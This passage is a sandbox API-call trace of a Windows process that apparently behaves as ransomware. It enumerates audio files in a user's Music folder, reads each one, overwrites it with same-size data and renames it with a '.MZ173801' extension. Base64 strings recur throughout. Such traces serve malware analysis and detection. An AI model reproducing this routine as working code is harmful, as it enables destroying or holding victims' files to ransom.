lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.756] GetCurrentThreadId () returned 0x1358 [0117.756] GetCurrentThreadId () returned 0x1358 [0117.756] GetCurrentThreadId () returned 0x1358 [0117.756] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0ANPHQ2sWdNCoQ54jO.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0anphq2swdncoq54jo.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.756] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0117.756] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.756] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0xd5da [0117.756] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.756] ReadFile (in: hFile=0x404, lpBuffer=0x2432c60, nNumberOfBytesToRead=0xd5da, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0xd5da, lpOverlapped=0x0) returned 1 [0117.758] CloseHandle (hObject=0x404) returned 1 [0117.759] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0ANPHQ2sWdNCoQ54jO.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0anphq2swdncoq54jo.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.760] WriteFile (in: hFile=0x404, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xd5da, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0xd5da, lpOverlapped=0x0) returned 1 [0117.761] CloseHandle (hObject=0x404) returned 1 [0117.763] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0ANPHQ2sWdNCoQ54jO.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0anphq2swdncoq54jo.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0ANPHQ2sWdNCoQ54jO.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0anphq2swdncoq54jo.m4a.mz173801")) returned 1 [0117.764] GetCurrentThreadId () returned 0x1358 [0117.764] GetCurrentThreadId () returned 0x1358 [0117.764] GetCurrentThreadId () returned 0x1358 [0117.764] GetCurrentThreadId () returned 0x1358 [0117.764] GetCurrentThreadId () returned 0x1358 [0117.764] GetCurrentThreadId () returned 0x1358 [0117.764] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc66dc60, ftCreationTime.dwHighDateTime=0x1d5e338, ftLastAccessTime.dwLowDateTime=0x408334a0, ftLastAccessTime.dwHighDateTime=0x1d5e9c4, ftLastWriteTime.dwLowDateTime=0x408334a0, ftLastWriteTime.dwHighDateTime=0x1d5e9c4, nFileSizeHigh=0x0, nFileSizeLow=0x9c3b, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="0Ctn.m4a", cAlternateFileName="")) returned 1 [0117.764] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.764] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.764] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0Ctn.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0ctn.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc66dc60, ftCreationTime.dwHighDateTime=0x1d5e338, ftLastAccessTime.dwLowDateTime=0x408334a0, ftLastAccessTime.dwHighDateTime=0x1d5e9c4, ftLastWriteTime.dwLowDateTime=0x408334a0, ftLastWriteTime.dwHighDateTime=0x1d5e9c4, nFileSizeHigh=0x0, nFileSizeLow=0x9c3b)) returned 1 [0117.765] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.765] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.765] GetCurrentThreadId () returned 0x1358 [0117.765] GetCurrentThreadId () returned 0x1358 [0117.765] GetCurrentThreadId () returned 0x1358 [0117.765] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.765] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.766] GetCurrentThreadId () returned 0x1358 [0117.766] GetCurrentThreadId () returned 0x1358 [0117.766] GetCurrentThreadId () returned 0x1358 [0117.766] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0Ctn.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0ctn.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.766] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0117.766] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.766] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x9c3b [0117.766] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.766] ReadFile (in: hFile=0x404, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x9c3b, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0x9c3b, lpOverlapped=0x0) returned 1 [0117.767] CloseHandle (hObject=0x404) returned 1 [0117.768] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0Ctn.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0ctn.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.769] WriteFile (in: hFile=0x404, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x9c3b, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f424*=0x9c3b, lpOverlapped=0x0) returned 1 [0117.771] CloseHandle (hObject=0x404) returned 1 [0117.774] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0Ctn.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0ctn.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0Ctn.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0ctn.m4a.mz173801")) returned 1 [0117.774] GetCurrentThreadId () returned 0x1358 [0117.774] GetCurrentThreadId () returned 0x1358 [0117.774] GetCurrentThreadId () returned 0x1358 [0117.774] GetCurrentThreadId () returned 0x1358 [0117.774] GetCurrentThreadId () returned 0x1358 [0117.774] GetCurrentThreadId () returned 0x1358 [0117.774] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x347b5890, ftCreationTime.dwHighDateTime=0x1d5e997, ftLastAccessTime.dwLowDateTime=0x462166a0, ftLastAccessTime.dwHighDateTime=0x1d5e29b, ftLastWriteTime.dwLowDateTime=0x462166a0, ftLastWriteTime.dwHighDateTime=0x1d5e29b, nFileSizeHigh=0x0, nFileSizeLow=0x165a2, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="0L-oxNwdFYy.wav", cAlternateFileName="0L-OXN~1.WAV")) returned 1 [0117.774] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.774] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.774] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0L-oxNwdFYy.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0l-oxnwdfyy.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x347b5890, ftCreationTime.dwHighDateTime=0x1d5e997, ftLastAccessTime.dwLowDateTime=0x462166a0, ftLastAccessTime.dwHighDateTime=0x1d5e29b, ftLastWriteTime.dwLowDateTime=0x462166a0, ftLastWriteTime.dwHighDateTime=0x1d5e29b, nFileSizeHigh=0x0, nFileSizeLow=0x165a2)) returned 1 [0117.775] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.775] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 